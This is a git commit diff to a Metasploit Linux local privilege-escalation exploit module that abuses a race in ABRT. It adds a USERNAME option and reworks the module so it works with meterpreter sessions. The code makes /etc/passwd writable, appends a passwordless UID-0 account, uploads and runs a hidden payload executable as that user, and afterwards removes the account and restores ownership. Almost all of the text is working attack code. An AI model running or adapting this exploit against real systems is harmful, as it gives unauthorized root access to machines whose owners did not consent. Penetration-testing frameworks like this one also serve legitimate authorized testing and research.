Support meterpreter sessions

bcoles · bcoles · commit 74ab02f27b32 · 2018-02-03T11:55:08.000Z
diff --git a/modules/exploits/linux/local/abrt_raceabrt_priv_esc.rb b/modules/exploits/linux/local/abrt_raceabrt_priv_esc.rb
@@ -59,6 +59,7 @@ def initialize(info = {})
     register_options(
       [
         OptInt.new('TIMEOUT', [ true, 'Race timeout (seconds)', '900' ]),
+        OptString.new('USERNAME', [ false, 'Username of new UID=0 user (default: random)', '' ]),
         OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
       ])
   end
@@ -123,8 +124,13 @@ def exploit
       fail_with Failure::NotVulnerable, 'Target is not vulnerable'
     end
 
-    chown_file = '/etc/passwd'
-    username = rand_text_alpha rand(7..10)
+    @chown_file = '/etc/passwd'
+
+    if datastore['USERNAME'].blank?
+      @username = rand_text_alpha rand(7..10)
+    else
+      @username = datastore['USERNAME']
+    end
 
     # Upload Tavis Ormandy's raceabrt exploit:
     # - https://www.exploit-db.com/exploits/36747/
@@ -143,47 +149,41 @@ def exploit
     cmd_exec "cd '#{base_dir}'"
 
     # Launch raceabrt executable
-    print_status "Trying to own '#{chown_file}' - This might take a few minutes (Timeout: #{timeout}s) ..."
-    output = cmd_exec "#{executable_path} #{chown_file}", nil, timeout
+    print_status "Trying to own '#{@chown_file}' - This might take a few minutes (Timeout: #{timeout}s) ..."
+    output = cmd_exec "#{executable_path} #{@chown_file}", nil, timeout
     output.each_line { |line| vprint_status line.chomp }
 
     # Check if we own /etc/passwd
-    unless cmd_exec("[ -w #{chown_file} ] && echo true").include? 'true'
-      fail_with Failure::Unknown, "Failed to own '#{chown_file}'"
+    unless cmd_exec("[ -w #{@chown_file} ] && echo true").include? 'true'
+      fail_with Failure::Unknown, "Failed to own '#{@chown_file}'"
     end
 
-    print_good "Success! '#{chown_file}' is writable"
+    print_good "Success! '#{@chown_file}' is writable"
 
     # Add new user with no password
-    print_status "Adding #{username} user to #{chown_file} ..."
-    cmd_exec "echo '#{username}::0:0::/root:/bin/bash' >> #{chown_file}"
-
-    # Switch to new user
-    vprint_status 'Switching to new user...'
-    cmd_exec "su - #{username}"
-    id = cmd_exec 'id'
-    vprint_line id
-    unless id.include? 'root'
-      fail_with Failure::Unknown, 'Failed to gain root privileges'
-    end
-
-    # Remove new user
-    cmd_exec "sed -i 's/^#{username}.*$//g' #{chown_file}"
-    passwd = cmd_exec "grep #{username} #{chown_file}"
-    if passwd =~ /#{username}/
-      print_warning "Could not remove the '#{username}' user from #{chown_file}"
-    end
-
-    # Reinstate /etc/passwd ownership
-    cmd_exec "chown root:root #{chown_file}"
+    print_status "Adding #{@username} user to #{@chown_file} ..."
+    cmd_exec "echo '#{@username}::0:0::/root:/bin/bash' >> #{@chown_file}"
 
     # Upload payload executable
-    payload_name = ".#{rand_text_alphanumeric rand(5..10)}"
-    payload_path = "#{base_dir}/#{payload_name}"
+    payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
     upload_and_chmodx payload_path, generate_payload_exe
 
     # Execute payload executable
     vprint_status 'Executing payload...'
-    cmd_exec payload_path
+    cmd_exec "/bin/bash -c \"echo #{payload_path} | su - #{@username}&\""
+  end
+
+  def on_new_session(session)
+    # Reinstate /etc/passwd ownership
+    session.shell_command_token "chown root:root #{@chown_file}"
+
+    # Remove new user
+    session.shell_command_token "sed -i 's/^#{@username}.*$//g' #{@chown_file}"
+    passwd = session.shell_command_token "grep #{@username} #{@chown_file}"
+    if passwd.include? @username
+      print_warning "Could not remove user '#{@username}' from #{@chown_file}"
+    end
+
+    super
   end
 end
